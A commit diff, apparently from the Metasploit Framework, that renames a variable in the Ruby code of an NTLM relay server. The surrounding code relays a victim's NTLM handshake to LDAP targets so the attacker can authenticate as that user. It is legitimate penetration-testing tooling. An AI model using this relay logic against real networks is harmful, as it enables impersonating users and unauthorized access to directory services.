Renamed ldap_client to relayed_connection

Author: jheysel-r7

lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb

@@ -7,13 +7,13 @@ class ServerClient
     attr_accessor :cli, :state, :redirect_uri
 
     def initialize(cli, relay_targets, logger, timeout = 25)
-      @cli             = cli
-      @state           = :unauthenticated
-      @relay_targets   = relay_targets
-      @logger          = logger
-      @timeout         = timeout
-      @ldap_client     = nil
-      @current_target  = nil
+      @cli                 = cli
+      @state               = :unauthenticated
+      @relay_targets       = relay_targets
+      @logger              = logger
+      @timeout             = timeout
+      @relayed_connection  = nil
+      @current_target      = nil
 
       @ntlm_context   = {
         wrapper: :none,
@@ -59,8 +59,8 @@ def process_request(req)
 
         elsif parsed_ntlm && parsed_ntlm.is_a?(Net::NTLM::Message::Type1)
           logger.print_warning("Client restarted the handshake! Resetting state to handle new Type 1...")
-          @ldap_client.disconnect! if @ldap_client
-          @ldap_client = nil
+          @relayed_connection.disconnect! if @relayed_connection
+          @relayed_connection = nil
           handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
 
         else
@@ -127,10 +127,10 @@ def handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
       end
 
       begin
-        logger.print_status("Attempting to relay to #{@current_target.protocol}://#{@current_target.ip}:#{@current_target.port}")
-        @ldap_client = create_relay_client(@current_target, @timeout)
+        logger.print_status("Attempting to relay to #{Rex::Socket.to_authority(@current_target.ip, @current_target.port)}")
+        @relayed_connection = create_relay_client(@current_target, @timeout)
 
-        if @ldap_client.nil?
+        if @relayed_connection.nil?
           logger.print_error("Connection to #{@current_target.ip} failed: unable to create relay client")
           advance_to_next_target_via_redirect
           return
@@ -144,7 +144,7 @@ def handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
           incoming_security_buffer = parsed_ntlm.serialize
         end
 
-        relay_result = @ldap_client.relay_ntlmssp_type1(incoming_security_buffer)
+        relay_result = @relayed_connection.relay_ntlmssp_type1(incoming_security_buffer)
 
         if relay_result && relay_result.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
           type2_msg = relay_result.message
@@ -206,13 +206,13 @@ def handle_type3(parsed_type3)
         incoming_security_buffer = parsed_type3.serialize
       end
 
-      relay_result = @ldap_client.relay_ntlmssp_type3(incoming_security_buffer)
+      relay_result = @relayed_connection.relay_ntlmssp_type3(incoming_security_buffer)
 
       if relay_result && relay_result.nt_status == WindowsError::NTStatus::STATUS_SUCCESS
         relay_succeeded = true
 
         logger.on_ntlm_type3(
-          address: @ldap_client.target.ip,
+          address: @relayed_connection.target.ip,
           ntlm_type1: @ntlm_context[:type1],
           ntlm_type2: @ntlm_context[:type2],
           ntlm_type3: parsed_type3,
@@ -221,18 +221,18 @@ def handle_type3(parsed_type3)
 
         # Use the extracted identity here
         if identity.blank?
-          logger.print_status("Anonymous Identity - Successfully authenticated against relay target #{@ldap_client.target.ip}")
-          @ldap_client.disconnect! if @ldap_client
+          logger.print_status("Anonymous Identity - Successfully authenticated against relay target #{@relayed_connection.target.ip}")
+          @relayed_connection.disconnect! if @relayed_connection
         else
           logger.print_good("Identity: #{identity} -  Successfully relayed NTLM authentication to LDAP!")
-          logger.on_relay_success(relay_connection: @ldap_client, relay_identity: identity)
+          logger.on_relay_success(relay_connection: @relayed_connection, relay_identity: identity)
         end
 
-        @ldap_client = nil
+        @relayed_connection = nil
       else
         logger.print_error("Relayed authentication failed or was rejected by LDAP.")
-        @ldap_client.disconnect! if @ldap_client
-        @ldap_client = nil
+        @relayed_connection.disconnect! if @relayed_connection
+        @relayed_connection = nil
       end
 
       # 2. Pass the identity down to the target list tracker